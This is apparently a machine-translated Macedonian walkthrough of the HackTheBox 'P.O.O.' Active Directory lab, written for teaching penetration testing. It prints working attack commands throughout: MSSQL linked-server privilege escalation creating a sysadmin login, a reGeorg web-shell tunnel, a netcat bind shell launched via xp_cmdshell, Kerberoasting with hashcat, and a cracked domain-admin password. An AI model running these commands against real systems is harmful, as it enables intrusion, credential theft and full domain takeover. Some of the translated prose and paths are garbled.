🥇HackTheBoxendgame. Премин на лабораториски професионални офанзивни операции. Active Directory Pentest

Во оваа статија, ќе го анализираме преминот не само на машина, туку и на цела мини-лабораторија од страницата HackTheBox.

Како што е наведено во описот, POO е дизајниран да ги тестира вештините во сите фази на напади во мала средина Active Directory. Целта е да се компромитира достапен хост, да се зголемат привилегиите и на крајот да се компромитира целиот домен со собирање 5 знаменца во процесот.

Поврзувањето со лабораторијата е преку VPN. Се препорачува да не се поврзувате од работен компјутер или од домаќин каде што има важни податоци за вас, бидејќи влегувате во приватна мрежа со луѓе кои знаат нешто за безбедноста на информациите 🙂

организациски информации
За да можете да дознаете за нови статии, софтвер и други информации, создадов Телеграмски канал и група да разговара за какви било прашања во областа на ИИКБ. Исто така, вашите лични барања, прашања, предлози и препораки Ќе погледнам и ќе одговорам на сите..

Сите информации се дадени само за едукативни цели. Авторот на овој документ не презема никаква одговорност за каква било штета предизвикана некому како резултат на користење на знаењето и методите добиени како резултат на проучувањето на овој документ.

Вовед

Оваа крајна игра се состои од две машини и содржи 5 знамиња.

Даден е и описот и адресата на достапниот хост.

Да започнеме!

Recon знаме

Оваа машина има IP адреса од 10.13.38.11 која ја додавам во /etc/hosts.
10.13.38.11 poo.htb

Првиот чекор е да ги скенирате отворените порти. Бидејќи е потребно долго време да се скенираат сите порти со nmap, прво ќе го направам со Mascan. Ги скенираме сите TCP и UDP порти од интерфејсот tun0 со брзина од 500 pps.

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

Сега, за да добиете подетални информации за услугите што работат на пристаништата, ајде да извршиме скенирање со опцијата -A.

nmap -A poo.htb -p80,1433

Така, имаме услуги IIS и MSSQL. Во овој случај, ќе го дознаеме вистинското име на DNS на доменот и компјутерот. На веб-серверот нè пречекува почетната страница на IIS.

Ајде да ги повториме директориумите. Јас користам гобастер за ова. Во параметрите го одредуваме бројот на струи 128 (-t), URL (-u), речник (-w) и екстензии што нè интересираат (-x).

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

Така, имаме HTTP автентикација за директориумот /admin, како и датотеката за складирање на десктоп услугата .DS_Store достапна. .DS_Store се датотеки што ги складираат корисничките поставки за папка, како што се список на датотеки, локација на иконата, избрана слика за заднина. Таквата датотека може да заврши во директориумот на веб-серверот на веб-програмерите. Така, добиваме информации за содржината на директориумот. За ова можете да користите DS_Store пребарувач.

python3 dsstore_crawler.py -i http://poo.htb/

Ја добиваме содржината на директориумот. Овде најинтересно е директориумот /dev, од кој можеме да ги видиме изворите и датотеките db во две гранки. Но, можеме да ги користиме првите 6 знаци од имињата на датотеките и директориумите ако услугата е ранлива на IIS ShortName. Можете да ја проверите оваа ранливост користејќи Скенер за кратки имиња на IIS.

И наоѓаме една текстуална датотека што започнува со „poo_co“. Не знаејќи што да правам следно, едноставно ги избрав од речникот на директориуми сите зборови што почнуваат со „ко“.

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

И повторувајте со wfuzz.

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

И пронајдете го вистинскиот збор! Ја гледаме оваа датотека, ги зачувуваме ингеренциите (судејќи според параметарот DBNAME, тие се од MSSQL).

Го предаваме знамето, а напредуваме за 20%.

Аха знаме

Се поврзуваме со MSSQL, јас користам DBeaver.

Не наоѓаме ништо интересно во оваа база на податоци, ајде да создадеме SQL Editor и да провериме кои се корисници.

SELECT name FROM master..syslogins;

Имаме двајца корисници. Ајде да ги провериме нашите привилегии.

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

Така, нема привилегии. Ајде да ги видиме поврзаните сервери, напишав за оваа техника детално тука.

SELECT * FROM master..sysservers;

Така, наоѓаме друг SQL Server. Ајде да го провериме извршувањето на командите на овој сервер користејќи openquery().

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

И можеме дури и да изградиме дрво за пребарување.

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

Факт е дека кога правиме барање до поврзан сервер, барањето се извршува во контекст на друг корисник! Ајде да видиме каков кориснички контекст работиме на поврзаниот сервер.

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

А сега да видиме во кој контекст се извршува барањето од поврзаниот сервер до нашиот!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

Така, тоа е DBO контекст кој мора да ги има сите привилегии. Ајде да ги провериме привилегиите во случај на барање од поврзан сервер.

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

Како што можете да видите, ние ги имаме сите привилегии! Ајде да го создадеме нашиот админ вака. Но, тие не ги пуштаат преку openquery, ајде да го направиме тоа преку EXECUTE AT.

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

И сега се поврзуваме со ингеренциите на новиот корисник, ја набљудуваме новата база на податоци со знаменце.

Го предаваме ова знаме и одиме понатаму.

Знаме за назад

Ајде да ја добиеме школката користејќи MSSQL, јас користам mssqlclient од пакетот impacket.

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

Треба да добиеме лозинки, а првото нешто што веќе го запознавме е страницата. Така, ни треба конфигурација на веб-сервер (невозможно е да се фрли пригодна школка, очигледно заштитниот ѕид работи).

Но, пристапот е одбиен. Иако можеме да ја прочитаме датотеката од MSSQL, само треба да знаеме кои програмски јазици се конфигурирани. И во директориумот MSSQL дознаваме дека има Python.

Тогаш нема проблем да ја прочитате датотеката web.config.

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

Со пронајдените акредитиви, одете на /admin и подигнете го знамето.

подножје знаме

Всушност, има некои непријатности од користење на заштитен ѕид, но гледајќи низ мрежните поставки, забележуваме дека се користи и протоколот IPv6!

Додајте ја оваа адреса во /etc/hosts.
dead:babe::1001 poo6.htb
Ајде повторно да го скенираме домаќинот, но овој пат преку IPv6.

И услугата WinRM е достапна преку IPv6. Ајде да се поврземе со пронајдените ингеренциите.

Има знаменце на работната површина, предадете го.

P00ned знаме

По извидување на домаќинот со вински грашок не наоѓаме ништо посебно. Потоа беше одлучено повторно да се бараат ингеренциите (и јас напишав на оваа тема статью). Но, не можев да ги добијам сите SPN од системот преку WinRM.

setspn.exe -T intranet.poo -Q */*

Ајде да ја извршиме командата преку MSSQL.

На овој начин, го добиваме SPN на корисниците p00_hr и p00_adm, што значи дека тие се ранливи на напад како што е Kerberoasting. Накратко, можеме да ги добиеме хашовите на нивните лозинки.

Прво треба да добиете стабилна школка во име на корисникот MSSQL. Но, бидејќи сме ограничени во пристапот, имаме врска со домаќинот само преку портите 80 и 1433. Но, можно е да се тунелира сообраќајот преку пристаништето 80! За ова ќе користиме следната апликација. Ајде да ја испратиме датотеката tunnel.aspx во домашниот директориум на веб-серверот - C: inetpubwwwroot.

Но, кога се обидуваме да пристапиме, добиваме грешка 404. Тоа значи дека датотеките *.aspx не се извршуваат. За да ги активирате датотеките со овие екстензии, инсталирајте ASP.NET 4.5 на следниов начин.

dism /online /enable-feature /all /featurename:IIS-ASPNET45

И сега, при пристап до tunnel.aspx, го добиваме одговорот дека сè е подготвено.

Да го започнеме клиентскиот дел од апликацијата, кој ќе го пренесува сообраќајот. Ќе го проследиме целиот сообраќај од портата 5432 до серверот.

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

И ние користиме прокси синџири за да го испратиме сообраќајот на која било апликација преку нашиот прокси. Ајде да го додадеме овој прокси во конфигурациската датотека /etc/proxychains.conf.

Сега ајде да ја испратиме програмата на серверот неткат, со која ќе направиме стабилна bind школка, и сценариото Повикајте го Kerberoast, со кој ќе го извршиме нападот Kerberoasting.

Сега, преку MSSQL, го лансираме слушателот.

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

И ние се поврзуваме преку нашиот прокси.

proxychains rlwrap nc poo.htb 4321

И да ги земеме хашовите.

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

Следно, треба да ги повторите овие хашови. Бидејќи рок немавте речник со податоци за лозинка, ги користев СИТЕ речници за лозинки дадени во Seclists. За набројување користиме hashcat.

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

И двете лозинки ги наоѓаме, првата во речникот dutch_passwordlist.txt, а втората во Keyboard-Combinations.txt.

И така, имаме тројца корисници, одиме до контролорот на доменот. Ајде прво да ја дознаеме неговата адреса.

Одлично, ја научивме IP адресата на контролорот на доменот. Ајде да ги дознаеме сите корисници на доменот, како и кој од нив е администратор. За да ја преземете скриптата за да добиете информации PowerView.ps1. Потоа ќе се поврземе користејќи evil-winrm, наведувајќи го директориумот со скрипта во параметарот -s. А потоа само вчитајте ја скриптата PowerView.

Сега имаме пристап до сите негови функции. Корисникот p00_adm изгледа како привилегиран корисник, така што ќе работиме во неговиот контекст. Ајде да создадеме објект PSCredential за овој корисник.

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

Сега сите команди на Powershell каде што ги одредуваме Creds ќе бидат извршени во име на p00_adm. Ајде да прикажеме листа на корисници и атрибутот AdminCount.

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

И така, нашиот корисник е навистина привилегиран. Ајде да видиме во кои групи припаѓа.

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

Конечно потврдуваме дека корисникот е администратор на домен. Ова му дава право далечински да се најави на контролорот на доменот. Ајде да се обидеме да се најавиме со WinRM користејќи го нашиот тунел. Бев збунет од грешките издадени од reGeorg при користење на evil-winrm.

Потоа користиме друга, полесна, скрипта за да се поврзете на WinRM. Отворете и променете ги параметрите за поврзување.

Се обидуваме да се поврземе, и сме во системот.

Но, нема знаме. Потоа погледнете го корисникот и проверете ги работните површини.

На mr3ks го наоѓаме знамето и лабораторијата е 100% завршена.

Тоа е се. Како повратна информација, коментирајте дали научивте нешто ново од оваа статија и дали тоа ви беше корисно.

Можете да ни се придружите на Телеграма. Таму можете да најдете интересни материјали, споени курсеви, како и софтвер. Ајде да собереме заедница во која ќе има луѓе кои разбираат многу области од ИТ, тогаш секогаш ќе можеме да си помагаме за какви било прашања за ИТ и безбедноста на информациите.

Извор: www.habr.com

HackTheBoxendgame. Премин на лабораториски професионални офанзивни операции. Активен директориум Pentest